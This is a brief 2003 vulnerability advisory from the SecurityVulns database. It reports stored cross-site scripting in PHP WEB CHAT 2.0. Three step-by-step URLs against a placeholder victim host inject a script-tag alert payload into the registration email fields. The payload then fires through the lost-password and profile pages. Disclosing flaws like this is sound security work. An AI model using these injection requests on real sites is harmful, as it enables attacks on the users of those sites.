CSS in PHP WEB CHAT

2003-03-25T00:00:00
ID SECURITYVULNS:DOC:4276
Type securityvulns
Reporter Securityvulns
Modified 2003-03-25T00:00:00

Description

Product: PHP WEB CHAT Version: 2.0 OffSite: http://www.webscriptworld.com Problem: Cross Site Scripting


Actions:

1)Register http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=<scrpt>alert%20("Test!")</scrpt>&email1=<scrpt>alert%20("Test!")</scrpt>

2)To return the lost password and CSS is carried out (email) http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG

3)View profile (email1) http://[victim]/chat_dir/profile.php?username=OverG

Contacts: www.overg.com www.dwcgr0up.com irc.zaingandol.org #DWC ogprog@ukr.net

Best regards, Over G[DWC Gr0up]

P.S. Sorry for my English :)